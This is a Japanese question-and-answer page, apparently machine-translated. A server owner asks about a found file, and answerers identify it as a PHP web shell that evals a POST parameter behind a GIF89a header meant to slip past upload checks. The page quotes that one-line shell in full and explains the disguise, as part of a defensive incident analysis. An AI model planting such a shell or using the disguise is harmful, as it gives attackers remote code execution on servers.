web-dev-qa-db-ja.com

これはPHP変数への評価を含むファイルPOST変数は妥協の兆候ですか?

サーバーでこのファイルを見つけました。次のコードが含まれています。

GIF89a
<?php eval ($_POST[plm12345plm]); ?>

上記のもの以外に他のコードはありません。これは悪意がありますか?

4
Ben Bibikov

はい、これは不正です。このスクリプトは、任意のPHP plm12345plmとして渡されたコードを実行します。_POSTパラメータ。攻撃者は任意のPHPおよび-サーバーの構成に応じて-サーバー上の追加のコード。

最初のGIF89a行は、スクリプトをGIF画像としてアップロードする際の基本的なファイル検証をバイパスするために配置されている可能性があります。

ファイルが実際に実行される可能性がある場合、 サーバーが危険にさらされていると見なしてください 。直接実行できない場合、それでも ローカルファイルインクルード攻撃 を使用して悪用される可能性があります。

11
Jens Erat

はい、これはPHP Webシェルです。評価は赤旗であるべきです。

基本的に、ユーザーがサーバー上のこのファイルにアクセスできる場合、ユーザーはOSコマンドを実行できる可能性があります。サイトを適切に実装している場合、攻撃者はPHPをだまして、.GIFファイルであると想定しているコードを実行することはできません。

しかし、もし私があなただったら、私はそのハッチを警戒し、インシデント対応手順を開始します。誰かが間違いなく侵入しようとしましたが、それ以上の調査がなければ、成功したかどうかはわかりません。

5
baordog